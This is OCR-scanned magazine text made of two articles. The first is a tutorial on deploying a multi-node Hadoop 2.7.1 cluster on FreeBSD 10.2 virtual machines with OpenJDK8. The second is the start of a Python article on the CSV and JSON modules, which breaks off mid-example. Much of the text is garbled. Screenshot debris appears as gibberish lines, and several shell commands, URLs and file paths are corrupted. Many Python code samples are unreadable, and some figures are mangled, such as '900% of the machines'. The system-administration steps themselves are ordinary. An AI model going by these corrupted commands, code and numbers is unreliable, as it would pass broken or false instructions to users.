Cluster Solution on FreeBSD 10.2 
with OpenJDK8 


by Pedro Marcelo 


Hadoop is a piece of software that allows you to process big 
quantities of data, chunk it to small parts, send it to many 
computers for processing, check if any of them breaks dur- 
ing this process, recover the missing unprocessed data to a 
certain limit, put all parts back together, then, give you your 


answer. 
What will you lear? What should you know? 

e How to deploy a multi-node Hadoop e Some basic UNIX commands may 
cluster solution on FreeBSD 10.2 with help you get around on different tasks. 
OpenJDK8. 


= ae = — — = = z RT Pe =e Sees ee ge — — — . — — = 
_—— - iz — = — ee ee = OS eee Oe ee Oe ceca a 
ee ee % Z <= ie a ae ee — -— =e eae a ee ee —s = =_ ——_- _—_—-— ~~ ——- as ea a ee = : — — 


Introduction 


For years, I've accessed the open-source community for many different tasks and learning, both 
during my academic journey as well as during job related activities, now it's my turn to give back. 
This is my first formal written contribution. | hope I’m able to share some knowledge with you and 
it turns out to be beneficial in some way 


How do you match the world’s biggest and well known yellow elephant with the tiniest red devil to 
create your own Google-like cluster powerhouse? 
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Hadoop 


Maybe youre thinking of unicorns, magic potions and knights in shiny armor cutting through a for- 
est of UNIX files. Keep calm, you only need a few magic words (console commands), a few mix- 
tures (configurations) and some wizardly patience. 


What is Hadoop? 


“The Apache Hadoop software library is a framework that allows for the distributed processing of 
large data sets across clusters of computers using simple programming models. It is designed to 
scale up from single servers to thousands of machines, each offering local computation and stor- 
age. Rather than rely on hardware to deliver high-availability, the library itself is designed to de- 
tect and handle failures at the application layer, so delivering a highly-available service on top of 
a cluster of computers, each of which may be prone to failures.” 


From this description, simplifying it, Hadoop is a piece of software that allows you to process big 
quantities of data, chunk it into small parts, send it to many computers for processing, check if 
any of them breaks during this process, recover the missing unprocessed data to a certain limit, 
put all parts back together, then, give you your answer. 


What does Hadoop architecture look like’? And what does each of those things do? 


High Level Architecture of Hadoop 


Master Node Slave Node Slave Node 
Task Tracker : | = 


_— 


| 
ed 
' 


Figure 1. A very high 
level architecture of Ha- 
doop 
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Hadoop is constituted with two very different layers and two types of hosts (computers). 


The first layer is the MapReduce. In this layer, the processing of your data occurs and the data is 
checked and mapped (Map). The best way to understand this is by imagining a group of students 
that are separated, for example, by name, age and height. After this separation, they're reduced 
(Reduce), and counted to find out how many are in each group, how many of them have the 
same name, same age and same height and how many of those diverge from these equalities. 
The similar groups, people with the same name for example, are attributed to slower or busier ma- 
chines because they're easier and faster to process. It’s easy to call someone in a group if you 
know from the start they all have the same name, right? 4 In the same fashion, student groups 
with different names require more processing and are attributed to faster or less busy machines, 
because you have to check each person to find what you're looking for. 


The second layer is the Hadoop Distributed File System (HDFS), similar to normal file systems, 
like ext4 or NTFS, that you may have on your computer so your operating system knows how to 
store file names and folders. This system is like a giant hard disk, spread into smaller ones, work- 
ing as one. © When you send a file to this system, in reality, it was broken down into pieces and 
spread across many (physical) hard disks in the cluster. It's also fault-tolerant; if a hard disk dies 
for whatever reason your data is replicated on more disks, it’s just picking all the small parts from 
all of these and returning the original file. This too has a limit as you'll understand later. 


There are also two types of hosts, the masters and the slaves. On a conceptual level, the master 
does everything a slave does (processing + storage), plus managing. Ohh... how | wish this was 
real life. © In this tutorial, | opted to let the master do only the managing and the slaves do the 
processing and storage work (reality check here!), as not to overload the master host. Generally, 
the master hosts contain the JobTracker (now named ResourceManager) process which is re- 
sponsible for attributing tasks to many slaves and checking their progress, or, sending the stu- 
dent groups each to different class rooms and see how well they're doing. Masters also have the 
NameNode process which is responsible for providing small parts of the global data to be proc- 
essed by each host, or, sending exams to many class rooms, good luck in there. © 


To summarize, the ResourceManager tells you what kind of data you will be processing, for exam- 
ple, an engineering or biology exam, while the NameNode searches the HDFS and hands you 
the sufficient data to process according to your level of processing power, your respective exam 
for your grade. The following image may also help to understand. 
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Figure 2. Hadoop global workflow. 


Name Node 


Client 


J 
* 
- 
£ x J 
4 
“ 


In this picture, you can also see 
7 data replication; this is an important 
F ait, decision for every system adminis- 
: trator that you will learn later on this 
tutorial. For the moment, keep in 
mind the number distribution on the 
different hard disks. 


There is also one very important 
part of this architecture, the Yet An- 


Man Pedure Mar Redure Ms) Perfrce Man ~eniure 
which is part of the ResourceMan- 


ager. 


Data Replication on Multiple Nodes 


The YARN process allows the orchestration of all the resources available on the cluster, each 
NodeManager from each host communicates their available resources, such as CPU utilization, 
free hard disk space, available RAM and network speed, back to YARN. 


In this way, YARN decides which node will receive a specific data for processing based on their 
current relative processing power and response speed, maintaining a balance and optimal sys- 
tem performance. To put it simply, it's like checking if a class room can accommodate more stu- 

dents from a different discipline and if 
the supervising teacher has process- 

HADOOP 2.0 ing power enough to keep an eye on 

each group in the class room even if 

if )! + xf they're distinct, so they won't copy in 

Pig Hive Others RT the exam from their own group. It’s 

(batch) | (dataflow) | (sql) (cascading). StFEAM, carvices’ not wise trying to copy from your biol- 

Graph Base ogy mates if you’re from engineering. 

Tez ce © The following picture shows two 

(execution engine) different tasks being executed on dif- 

ferent nodes and divided into sub- 

tasks on different nodes because 

those nodes can accommodate 
them. 


igure 3. The YARN process on the sys- 
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, Figure 4. YARN allocating tasks and sub- 
YARN Archite cture tasks to different nodes. 


(—/ Why Hadoop? 
By using a distributed computation 
software, you allow your heavy duty 
$---0f Container ss | work to spread across many comput- 
Cf ers, sO a process that would take 
| | | days or even weeks to solve can now 
a ss take a few hours or minutes, depend- 
: ing on the hardware available. This 
| | can be rendering a house model, 
Pes | weather forecast, seismic data, engi- 
neering calculations and math prob- 
lems, financial, pretty much anything. 


Hadoop is used mainly by very large corporations, like Google, Adobe, Yahoo, Facebook and 
IBM, who need fast information from millions of files and users. You can view a more detailed list 


here: http://wiki.apache.org/hadoop/PoweredBy 


| tried to simplify this tutorial as much as possible, for both beginners and experts alike. Soon 
you ll have your own (micro) system running so... let's get our quest started! © 


Setting up the FreeBSD system 


I'm assuming you can install a virtualization platform, like Virtualbox, and have sufficient knowl- 
edge on how to install the latest release of FreeBSD 10.2. If not, please check some tutorials on- 
line, like on YouTube; some of them are very simple and straightforward. 


For this tutorial, you will need, during installation, to create a user named hadoop, add it to the 
wheel group and choose the shell type csh. Later on, | also explain how to add the user to this 
group and attribute sudo privileges, but if you have done this previously, you can skip that step. | 
also recommend not to add a swap partition to disk. This approach allows all tasks to be up- 
loaded to physical RAM, reducing disk read and writes. Also, add support for IPv4 on your LAN 
card and DHCP, IPv6 is not needed. 


For this example, I’m using FreeBSD 10.2 (amd64), | created a virtual machine (VM) named 
“Master” with two logical processors, 512MB of RAM and a 20GB hard disk. | prefer to use an 
SATA/AHCI connector on the hard disk; it's way faster than an IDE connector and for a system 
like this, you need every drop of performance you can get. 
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| also enabled a couple of technologies that are useful: 


e PAE/NX features, if you're using a 32 bit (i886) version of FreeBSD, otherwise, it's not 
needed. This allows one to use 4GB of RAM in these systems. 


e Set paravirtualization to KVM; allows better interaction with the host operating system 
due to kernel modules present on FreeBSD improving overall performance of the virtual machine. 


e VT-x/AMD-V, enables virtualization extensions for hardware acceleration. 
e Nested paging, optimizes memory management. 


e 3D acceleration, may help for the GUI (if you wish to install KDE or XFCE later), al- 
though it’s not fully required. 


Do make sure you have VI-x or AMD-V enabled on your computer BIOS and other virtualization 
related technologies that your hardware may possess. 


First, let's install sudo so our hadoop user can run commands with root privileges and a small file 
editor, nano. We will also install OpenJDK8, an open-source alternative to Java and the shell 
bash both will be needed to start and run Hadoop. Run these commands in the shell in order: 


e su 

e pkg install sudo 
e pkg install nano 
e pkg install bash 


e pkg install openjdk8& 


After installing bash, just ignore on- 
screen instructions because we will 
do this after installing the next pack- 
age. 


vot soe Uw» ls) crore 


Figure 5. If you can see this, then we are on the starting point. :) 
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end DE implecmentatio 


mounted on pro 


permancnt, you need the following line 
fdescts rid 
pros rt: 


— ay Ly ®} CTRL OMETTO 


Add these lines to the file, save and exit (CTRL+X): 


e fdesc /dev/fd fdescfs rw0O O 


e proc /proc procfs rw0O0 0 


GNU nano 2.4.2 File: etervfstab Modified 


Mountpoint FS type 
ul! 
imu ad fdeect: 


pro proct: 


modified buffer CAMSWERING “No” WILL DESTROY CHANGES) 7? 


Y 
NE, ae Canc: 


- 
7 — 


ms a | #) CTR. CORETT 
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After installing OpenJDK8, you 
need to mount a few file systems; 
run: 


e mount -t fdescfs fdesc 


/dev/fd 
e mount -t procfs proc /proc 


To make these changes perma- 
nent, you must add these mount 
points to the /etc/fstab file. 


e nano /etc/fstab 


You will want to rehash to be sure 
that you can use your new Java 
binaries immediately: 


e rehash 
e java 


lf you see Java options on the ter- 
minal, everything went as it 
should. 
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| 
Now let's add our user hadoop to 
the wheel group. In the user crea- 
tion process, you should have 
added the user to this group, if not, 
Uncomment to allow members of group su execute any ci follow this step and the next. Un- 
' a So yas aus eae an eee ee EP es — comment the lines that allow users 
ge ot tne Meer they are running the command az (root by defas in the wheel and sudo groups to 


# ALL ALL=(ALL) ALL #& WARMING: only use this together with "Defaults tar m™ run the sudo command. 


ti tt Head 
Hn 


GNU nano 2.4.2 File: /usr/local/etc/sudoers Modif ied 


lincomment to 


wheel ALI 


e nano /usr/local/etc/ 
Sudoers 


. | t) L 
il - 2 — ae? |) #) CTRL OMETTO 


Add hadoop user to the wheel group and then exit the root login. 
@® pw .usermod hadoop —G wheel 
e exit 


% Your hadoop user now has root 
privileges and can use the sudo 
command. Login again as ha- 
doop user. 


GNU nano 2.4.2 File: .cshre 


Now that the hadoop user can 
use sudo, we need to add the 
JAVA HOME variable to csh 
shell in home folder. By doing 


JAVA HOME ‘ , . 
| this, we are telling the operating 
fprompt then . . 
" @ he duterective shell — est cous s system to load each time this 

set prompt NG Xe . : ; 
st promptchars = "xe" user logs in a variable named 
JAVA_HOME. 

————EE es = Many programs use this name 


to know where the Java virtual 


machine Is located. 
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Do this, then logout and login again with your user. 


cd ~ 


e sudo nano .cshrc 


You can test if the JAVA HOME variable 
is correctly set. Executing the next two 
commands will take you to Java folder 
and home folder again. 


e cd $JAVA HOME 


@ cd ~ 


ao & 2 Oe GG & [e) cmornr 


to your user home folder. 


Get latest version (2.7.1) of Hadoop binary files from Apache or one of their mirror websites. 


e fetch —a 
htto://mirrors.fe.up.pt/pub/apache/hadoop/common/hadoop-2./.1/hadoop-2./.1.tar.qz 


- Now let’s untar the gZiped file (.tar.gZ). 


libexec/yarn-conf } roe 
| bexecshadoop-conf ig .cmd e tar xvfz hadoop-2.7.1.tar.gz 
libexec/manpres: yah 

| i be oes 

libe xe 

| i ber oes na Drees 

Bieta 

| i bee 

libexecsuarn col 

libexecshdf 

README.txt 

NOTICE .txt 


vot 2 OSs U » |s) cron 
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a ee wy = (:) Detats BD) Snaehots 


Ot oyster ectt CC TT 
—_ jeners Nertework 
Dipl shite Wetrer’ Adapter 
il Attached to: NAT - 
tore 
Net attached 
i 4 NAT 
rr hud AT Metre 
D Advance 
at Neterert Internal Netwror 
= Host -orfy Adacter 
- - rer Driver 
Cp serial 
7 va 
—" 
Td Saves 
Du. 


[a] | ot) | 


Figure 12. Change network to bridged adapter. 


Power off your virtual machine, by closing 
the window and sending the ACPI signal for 
a graceful shutdown. Now let's configure the 
hostname and IP address for the master. 
Make sure you have set your virtual machine 
network adapter to “bridged adapter’, so it 
will behave just as another computer in the 
room. Start your VM. 


Edit the /etc/hosts file and add the master 
and slaves IPs. By adding this, each ma- 
chine will “Know” each other. For the sake of 
this example, we will add three slave ma 


chines. You can add more if you want to, as long you have the necessary resources for it. 


® sudo nano /etc/hosts 


P| Check the hostname of the master VM, it 


Should be correct. You'll also need to edit this 
file for each of the slave VMs to their correct 
hostname after the full clone. 


e sudo nano /etc/rc.conf 


Figure 13. Add a unique IP and hostname for each machine. Save and exit. 
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GNU _nano — ae image below. You must enter the IP of the 


heh fre 


master VM and the listening port. 
e cd hadoop-z2./.1 
e sudo nano etc/hadoop/core-site.xml 


Now we need to edit the HDFS file to 
change the namenode and datanode ad- 
dress, make double sure they're pointing to 
your hadoop folder and sub-folders! This 
must be a full path and not a relative path! 
In the image is present a relative path for 
display purposes; the correct paths are: 
file:/home/nadoop/hadoop-2./7.1/ etc/hadoop/ 
hadoop data/hdfs/namemode and 
file:/nhome/hnadoop/hadoop-2./.1/etc/hadoop/h 
adoop_data/hdfs/datanode 


t)}* 
oO to Live 
- = a |) ®) CTRL OIREITO 


a 1: 1: : 1. 
Here we will also be using a replication of 


a cee es ee ei es ti three, this means, that each processing 
or the specific language governing permissions ar block will be replicated by three (check 
Fig. 2 on introduction) alongside other 
blocks throughout the cluster. This allows 
for data to be more secure in case of host 
failure. A high replication makes global 
processing more secure, as there's fewer 
chances of missing information and the 
job halts, but also affects bandwidth per- 
formance as it will be increasingly slower. 


GNU nano 2.4.2 File: eteshadoop/core-site.xml 


; ii 
Lt . = 0) Live 
= ay | ®)| CTRL OFRETTO 


Now we need to go to the Hadoop folder we 
just downloaded and extracted to edit its con- 
figuration files. We need to add the property 
tag with the information about where the 
HDFS file system is located, as shown in the 
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| 
GNU nano 2.4.2 In a real life environment, this is a big deci- 
sion to make, a tradeoff between security 
and performance. With a replication of two, 
900% of the machines in a cluster need to 
break before losing data, with a replication of 
three, approximately 66,67% of machines in 
a cluster need to break before the losing of 
data. When reaching these values, the clus- 
ter becomes gradually slower at processing 
| as it tries to compensate for the lost ma- 
~ 3 22 #4 scmomno Chines until it eventually stops. Add the prop- 
erties with the correct path to the file as 
shown in the picture. 


File: etc/hadoop/yarn-site .xel 


> Series =f 


| 


GNU nano 2.4.2 File: etc/hadoopshdfs-site.xml Modif ied ° sudo Nano etc/hadoop/hdfs-site.xml 


| WANHANTIES UR CUNDITIUNS UF AMY KINI 
f cense ; pe | 


for the specific language governing permissions and Edit the YARN file (check Fig. 4 on introduc- 
tion) and add the properties shown in the 
two images below. Basically, we are centraliz- 
ing the resource management on one single 
machine, that is our master each to a differ- 
ent port. 


e sudo nano etc/hadoop/yarn-site.xml 


Edit the MapReduce file and add the prop- 

erty in the image below. This will be telling Ha- 

. doop who is the machine and port that will be 
ners nme tracking the job's progress on the cluster. 


arn-site.xml 


e sudo nano 
etc/nadoop/mapred-site.xml.template 


To ; : rte 
- 2 = a J ©) CTRL OIREITO 
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4 

GNU nano 2.4.2 File: etcshadoop/mapred-site .xml. template Modif ied Let's create the hadoop data and namenode 
‘peruiosions ant folder structure and give recursive ownership 

to our hadoop user and group wheel for all 

folder and files. 


e sudo mkdir —p hadoop data/hdfs/ 
namenode 


e sudo chown -R hadoop:wheel 
/nome/hadoop/hadoop-z2. 7.1 


text Lo Lae rm in Live 
a. 23 (882 OC & 8) ce omero 


Figure 19. Add the property to MapReduce file. Save and exit. 


Now it’s time to clone our master VM and create the slaves! Shut down master VM and go to your 
Virtualobox menu Machine > Clone. Create three full clones, Slave1, Slave2 and Slave3. Make 
sure you select Reinitialize the MAC address of 


@ Oracle VM VirtualBox Manages a «all network cards, otherwise they will all have 
File Machine bielp J 
a @ New. cote the same MAC address and you wont be able 
2, Add. Ctrl +A Ki) Detads Eid Snapshers : 
Mm Settings cule to ping or connect between them. 
a @ Clone. Cleo eral 5 Preview - 
ug Remove Ctrl +R Mest ev 
A Group Cee _27steRE FreeBSD (64-ba:) 
oP Start > = - 
wy L2 "6 
- aan a, Herd Oe 
AMD Nested 
srr, PALS 
Ce Show Log. Ctrlel ™ tice 
ary: 6M 
pases “ 7 tog er ver. este 
Be Sort = 
onmroder: SATA 
ATA Port 0 [Optical Drive] Empty 
SATA Port 1; Master.va (Normal, 20,00 Gi) 
ye Audio 


Most Driver: Windows DerectSound 
Cortrofer: [CM Aco? 


Fgure 20. Create a full clone of the master VM. 
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7 Jracke VM VetuslBoxu Mar aoer _ = 


Fle Machrne 4H 


ep 
) hey ¢ ’ 
iat wee >. 


New Settings Rat 


ys Master c..4 
( Powered Off 
se: Master 
> avd tr i's 


4), | Shovel 


{e) Detats «= Snapshots 


” Preview 


re) Pewwered OFF 
A+) | Steve? Base Memory: SIZ MO 
re) Powered OFF Procesaors: 2 
Execition Cag: © 
7 Best Order wal, 4erd Ces 
ia ; 
' Stave - Aooeter ation: IAMD-* Nested 
(@ Powered Off , 
orp, PRES 
uw avetusera 
“ Display 
Video Memory MB 
Acceter ation 0 
Remote Deshton Server: wshbes 
Valeo Capt reatibes 
ig Storage 
rtroker: SATA 
ATA Port 0: xa E 
ATA Port 1 Aasher.vG (he a € 
je Audio 


host Orrver: Windows OvrectSourcd 
Cortrober: CHA 


Figure 21. There's four devils right there! :) 


@ #7 078078 w.@7-88 078 


Figure 22. Change hostname and IP for each VM. 
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otart all VMs. We need to change the host- 
name and IP address of each VM in accor- 
dance with /etc/hosts file we modified earlier. 
Edit the /etc/rc.conf to change the hostname of 
each VM and the IP address, as well as add- 
ing the defaultrouter, which is the IP address 
of your physical router. Do this for each one. 


e sudo nano /etc/rc.conf 


Reboot all VMs and check that all of them 
have the correct hostnames (visible on the 
shell prompt) and the correct IP address; for 
this use the ifconfig command. 


Now edit the HDFS file in the master VM and 
completely remove the dfs.datanode.data.dir 
property. In the slave VMs, remove completely 
the dfs.namenode.name.dir property. But do- 
ing this, we are defining that the master VM is 
the only one who receives the jobs to be exe- 
cuted and the slave VMs only receive the jobs 
distributed by the master VM. 


e cd hadoop-z2./.1 


e sudo nano etc/hadoop/hdfs-site.xml 
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For the machines to communicate with each 
other, we need to create a SSH private and 
public key and copy the pub to all of them. Go 
to your master VM and execute the next com- 
mand. 


e ssh-keygen 


Now edit the HDFS file in the master VM and completely remove the dfs.datanode.data.dir prop- 
erty. In the slave VMs, remove completely the dfs.namenode.name.dir property. But doing this, 
we are defining that the master VM is the only 
. One who receives the jobs to be executed and 
ubliczprivate. pairs the slave VMs only receive the jobs distributed 

by the master VM. 


e cd hadoop-z2./.1 


e sudo nano etc/hadoop/hdfs-site.xml 


vo oS JOS & G @ (& crLomerto 


For the machines to communicate with each other, we need to create a SSH private and public 
key and copy the pub to all of them. Go to your master VM and execute the next command. 


e ssh-keygen 
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Now let's add the master to the list of Known 
hosts and copy the pub SSH key to all ma- 
chines. 


e ssh-copy-id -i ~/.ssh/id_rsa.pub ha- 
doop@master 


e ssh-copy-id -i ~/.ssh/id_rsa.pub ha- 
doop@slave' 


e ssh-copy-id -i ~/.ssh/id_rsa.pub ha- 
doop@slave2 


’ ext To Spe Cc Tan _— 
vo & 2 OS U ls) crore 


e ssh-copy-id -i ~/.ssh/id_rsa.pub ha- 


You should be able to access all slave ma- 
u chines, use ssh <slavehostname> (eg: ssh 
Slave1) and then exit, just to make sure you 
can reach them. Now we need to tell the mas- 
ter VM who are the other masters and who 
are slaves. 


e sudo nano etc/hadoop/masters 


Now we need to tell the master VM who are 
the slaves VMs. 


e sudo nano etc/hadoop/slaves 


Now we will format the HDFS file system through bash in master VM. 
e cd bin 


e bash hadoop namenode —format 
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It's time to start Hadoop! © Be patient this 
may take a while, as Hadoop tries to set 
up all required services on all nodes. 


e Cd .. 
@ bash sbin/start-all.sh 


At this point, your Hadoop cluster is fully 
running and waiting for you to provide JAR 
files for processing. 


Hadoop comes with a set of examples located under share/nadoop/mapreduce folder. I’m pretty 
Sure youre anxious to test it, so, please, proceed to next topic. © 


Running your first example JAR on your 
new Hadoop cluster 


What do you do when you have some- 
thing new? You want to test it to see how 
good tt is! 


"jps" on all consoles to check all active 
processes. 


During processing of a JAR, the slave ma 
chines dont provide any console output. 


You can only see they're processing if you re looking to the blinking icons of the hard disk and net- 
work, otherwise, you can write the command top on each slave machine to see the CPU and 
RAM usage. Then, on the master VM, run the JAR. Since we have been talking about engineer- 
ing and students, we will try to calculate the value of tr (Pi) this should be well known to you... © 
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Figure 29. All processes on all VMs are now 


mg ‘ * — stopped. 
System 
Motherbosd Processcr Acoster ation 
we Meron Q rc 
‘ve “one Me Run top on the slave VMs and the 
post Ore Ee Oo next command on the master VM. 
at pee From the last two parameters, (10 10) 
ew ———— you are choosing how many maps 
F uch Porting Oevice S/2 Mouse ” 7 a 
= eS and reduce respectively will be cre- 
f dared Folder: ae ee ee ; ; 
BIB testantec — era ated for this job. 
cot) [ - = 
WP Audio 
fost rer: Windows OwectSound e bash bin/hadoop jar 


share/hnadoop/mapreduce/hadoop-mapreduce-examples-2.7.1.jar pi 10 10 


| know what you're thinking; “Out of swap space? What did | do wrong?” Well... you didn't. We 
made a decision and now we have to stick to it. If you remember, at the beginning of this tutorial, | 
told you not to create a swap partition on the disk. This would allow every process to be loaded to 
physical RAM, thus increasing processing performance. Hadoop is a VERY resource intensive 
system and our master VM has only 512MB of RAM, which is not enough to run this example. | 
wanted you to actually see this. The solution is simple; first we need to stop Hadoop, then shut- 
down master VM and add 1024MB to RAM in Virtualbox settings screen. 


: e bash sbin/stop-all.sh 


2 @7-88 0 ican vw @7.88 064 


gf 7-3? 


Figure 30. Increase master VM RAM to 1024MB. 
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Now shut down master VM and add 
1024MB of RAM to it; its OK to leave the 
other slave VMs running. If your system has 
very limited resources, you may opt to shut- 
down one of the slave VMs to compensate 
the increasing of RAM in the master VM. 


Start your master VM. Now we will be able to 
run the sample JAR. We need to start Ha- 
doop again, execute the JAR and draw 
some conclusions. Pay attention to CPU us- 
age and active RAM on each slave VM, it 
should increase slightly. 


. 2 

“wu #7880 . “w #7880 . 
2 2 

“v7 -8F0 bal “a #7870 


e cd hadoop-2./.1 
@ bash sbin/start-all.sh 


e bash bin/nadoop jar share/hadoop/mapreduce/hadoop-mapreduce-examples-2./.1.ja r 
pi 10 10 


As you can see, our Hadoop cluster returned 
the calculated value of 3.20 for Pi, which ts 
nowhere near the standard value of 3.14 and 
it did that in 11.637 seconds. This is due to 
the number of maps and reduces we told him 
to do. Let's re-run the sample and double 
these values to twenty. 


- TBE | : _ 


share/nadoop/mapreduce/hadoop-mapreduce-examples-2.7.1.jar pi 20 20 
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As you can see, by adding more mappings, the result was 3.17, way closer to 3.14 which is what 
we intended. But the processing increased due to more blocks and sub-tasks being created and 
it took 19.262 seconds to complete the job. You can try by yourself to increase the number of 
maps and reduces to thousands or millions and see what results you get. To better understand 
Map and Reduce you can read this quote from IBM: 


“As an analogy, you can think of map and reduce tasks as the way a census was conducted in 
Roman times, where the census bureau would dispatch its people to each city in the empire. 
Each census taker in each city would be tasked to count the number of people in that city and 
then return their results to the capital city. There, the results from each city would be reduced to a 
single count (sum of all cities) to determine the overall population of the empire. This mapping of 
people to cities, in parallel, and then combining the results (reducing) is much more efficient than 
sending a single person to count every person in the empire in a serial fashion.” 


| hope this tutorial demystified what Hadoop and distributed computing is all about. We have now 
concluded our set up and testing. And | must say... 


Congratulations! 


Hadoop is now running on your FreeBSD 10.2 VMs on top of OpenJDK8! Now you can truly ap- 
preciate the power of distributed computing on one of the most stable operating systems at the 
cost of open-source software. © 


You can search around the web for some other JARs to test your system or develop your own if 
you re comfortable with MapReduce. 


Hadoop is truly a fantastic piece of software, with emergence of developing countries and more 
people using the internet everyday on many devices, processing large amounts of data will be 
seen as common rather than exceptional. This tool is well positioned to follow and provide an an- 
swer to this transition. 


= — =, — SSS OS ar ri iene ees — a eee ee ee pen ‘ 
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Python Programming: The CSV and 
JSON Python Module 


by Rui Silva 


Files are a big part of programming. We use them for a lot of 
things. HTML files have to be loaded when serving a web 
page. Some applications export files in some formats that 
we need to read in other applications or even we want to be 
the ones doing the exporting. In this article, we will learn 
some concepts to help us understand how to use files and 
also some advanced ways of making use of them. 


Duck typing 


Duck typing is a very common way of typing objects in Python. The name Duck Typing comes 
from the expression “If it walks like a duck, swims like a duck and quacks like a duck, it is a 
duck”. In programming languages, this means that if an object is not of the type you desire but 
has the same methods, then it must do the same thing. To understand this concept more in 
depth, we'll be using Python's built-in StringlO object. 


StringlO is a file-like object that does not save files. This is very useful, for example, when you 
download a file from a web service but don't need to store it. We can put the file in a StringlO ob- 
ject and it will behave exactly like an actual file (because StringlO has the same methods as file 
objects). Contrary to file objects, StringlO will only save the file's contents to memory and not to 
disk (making it very fast when compared to actual files), with the downside that they are tempo- 
rary (which in some situations is exactly what we need). 


When initializing a file, you always need to provide 2 arguments: a file path and a opening mode 
(the most often used modes are 'r' and 'w' for reading and writing, respectively). With a StringlO, 
we only need to instantiate one without any arguments to get an empty file. If you want to initial- 


ize it with content, just pass a string as the first argument. 
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For example, if we want to store the contents of https://gooc 
something with it, we could do: 


Jle.com/ temporarily in memory to do 


S response = request.get ("https://google.com/") 


S) OCC Wes Se Oulie Sc. = Sue ee IO ISO SS CON CSc) 


From now on the variable google content will behave like a file and can be passed to any li- 
brary or package that expects a file. This is all due to duck-typing. 


Opening and reading from files 


Let's practice opening and reading files. In this section, I'll try to show some quirks about opening 
files, like "Universal newline" and such. First thing we need is a file. We can create a new empty 
file on disk by doing: 


open('/home/path/to/file/file.txt', 'w') 


The mode ‘'w' indicates that we are opening the file for writing and if no file exists with the name 
and path provided, one will be created. Note that if there is a file with the same name as the one 
you are trying to edit, it will be erased. If you want to append information to an existing file, use 
the ‘a’ mode. Try it. 


When you are done reading the data from the files, you should close the file by calling: 


ST elosen) 


This will release the file and free up any system resources used by the opening of your file. 


As of Python 2.5, a new statement was introduced to simplify this process: the with statement. 
This statement clarifies some code that previously would use try/finally blocks, so that it can be 
written in a more pythonic way. Using this, you can open a file and when you no longer use it, the 
file will be properly closed, even if some exceptions are raised along the way, and the system re- 
sources will be freed. Here’s an example of the proper opening of a file: 


with open('workfile', 'r') as £: 
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CSV files and csvreader 


Files can have many formats. One of the most common is CSV (comma separated values but you 
can also see TSV for tab separated values). The format of these files is very simple. The first row is 
either comma separated values of headers or direct data. The file we use is a CSV file. If you open 
the file, you can see that there is a header in the first line and the rest of the data follows. 


Read 


To read a CSV file, you need to use the CSV Python module, therefore, it needs to be imported be- 
fore you can use it (import csv). After that, and with an opened file, you can use the reader from the 
CSV module to create a reader, which can iterate over all the lines in the CSV file. Take a look at 
this example: 


>>> import csv 

>>> with open('csvfile.csv', 'rU') as f: 
reader = csv.reader(f, delimiter=',', dialect="excel') 
for row in reader: 


print row 


Py teneIgcloe eh NGA ort Ueaaloniys,, W sieelrioy ft Uleisvels ne lo snclasy es (SOh Ea Ts Visio ey 


Pele oleae) Ya, “jeneaove™ pa) “bene ine Biola” px, “Ldb@nae bie ieiS! 4) 


Reeve Ate MisINGIsh fone sen “SNS IRVIN E@W a “Shove ere shee dG yeare § Abe 2 eee -. tl ae, Al oro ounves tigotomle 
@leiene skein tes \Qiievolube wes o2dh> AGNGbS ONO ICHOh ME ID Mi AZAONO Ro ke.” NG Crane 6 seer tonoyd Liskov ag 
PS he Ser So 


['51 OMAHA CT', 'SACRAMENTO', '95823', 'CA', '3', '1', '1167', 'Resi- 
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pe DCB RAN eh ol toe AVE NEO aye Oat ep ee ee ee ee Og 
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['2805 JANETTE WAY', 'SACRAMENTO', '95815', 'CA', '2', '1', '852', 
ers aloleiquenkeiik pt “uivevehSiviehvs ail OG COO Ch imIDNL Zc 4 IO SISIO ye. SiceeNG ditoc sian 


pee ele ee | 


In this example, you can see that we open the sample file using the 'with' statement, and we use 
the opened file in the reader function. The reader function receives some useful args, aS you can 
see above. The delimiter defines the column separator, in this case a comma. The dialect argu- 
ment identifies a specific dialect (in this case the Excel), and loads a set of parameters specific to 
this particular dialect. You can get the list of all registered dialects using this command: 


De SEOs G Ast et Tolle Mere shi) 


i excel = web. eo 6ece | 


There are a number of extra arguments that you can pass the reader function, that you can check 
out in the CSV module page. 


Once you have the row object, you can access each column by index (row[O]) or you can use the 
rows iterator to your advantage and traverse the row's columns in a ‘for’ cycle, for example. 


Write 
Writing data to a CSV file is fairly similar to reading data. You have a writer instead of a reader 
and you send the rows to the writer and close the file in the end. It's as simple as that: 

Po No @b eae Ss 

>>> with open('newfile.csv', '‘wb') as csvfile: 


writer = csv.writer(csvfile, delimiter=' ’ 


Elenco lore ee) VE fbIO Ne akin Cis) 7 SOU Oa MN Eek) 


spamwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam']) 


Looking at the example, we can see that It’s similar in many aspects to the reader, including the 
delimiter, and other arguments. The delimiter was already explained in the reader. As for the oth- 
ers, the quotechar is a one-character string used to quote fields containing special characters, 
such as the delimiter or quotechar, or which contain new-line characters. It defaults to ° “ °. The 
quoting argument controls when the quotes are added, in this case, or when they should be read, 
when we are talking about the reader. AS mentioned above, more arguments exist and can be 
used, so you should consider taking a look at the module documentation. 
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Simplejson 


JSON is a human readable data format that became popular in web development as an alterna- 
tive to XML. It is mostly used to transmit data between client and server, but can also be used to 
store data. Python has a library to parse JSON data into Python data structures: 


>>> import json 


So, why do we need JSON? There are other ways to store and load data in Python: Pickle, for ex- 
ample. Pickle allows the serialization and unserialization of data in Python. As | said in the last sen- 
tence, the “in Python” part is very important. This data is only readable by Python, so it is not of 
much use for other system integrations... JSON, on the other hand, has gradually become one of 
the main information transmission formats, mainly in the web environment, but in many other con- 
texts. 


Generate JSON data from python 


In order to generate a JSON data structure directly from Python, we only need Python's default 
JSON module and the data structure we need to convert: 


2 MO et a em 
>>> data = {'three': 
>>> Json.dumps (data) 


ae Pee elena bile” PL egiigoiee e Pe eee et eae, 


It's as simple as that! You are using Python after all... 


Parse JSON data with python 


As you are probably guessing right now, reading JSON data into Python is also extremely simple: 


>>> import json 


eC ech ee Olle (eee, : , "three": 3, 
ie Dale 


Pe Seer 8 Wee chs 4 Sle <cleicey), 


ue Siesinyer s 


NO 

NO 
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As you can see, working with JSON is extremely simple in Python. 
Practical exercise 


Now let's try a bigger project. In this example, we need to get some sample data. What we are 
looking for is a file with sentences (one per line). Fortunately, there’s one here. As you can see, 
the file is a CSV file, so we already know how to process one, right’? 


Read file with a sentence per line 


Ok, let's start by reading the file, one sentence per line and store it in a list to be processed later: 


EP} AUMierencis. Tens 

>>> data = [|] 

Dee Ane lay ACOSO. 7 Ose el Iba nicl) A) yells} vies 
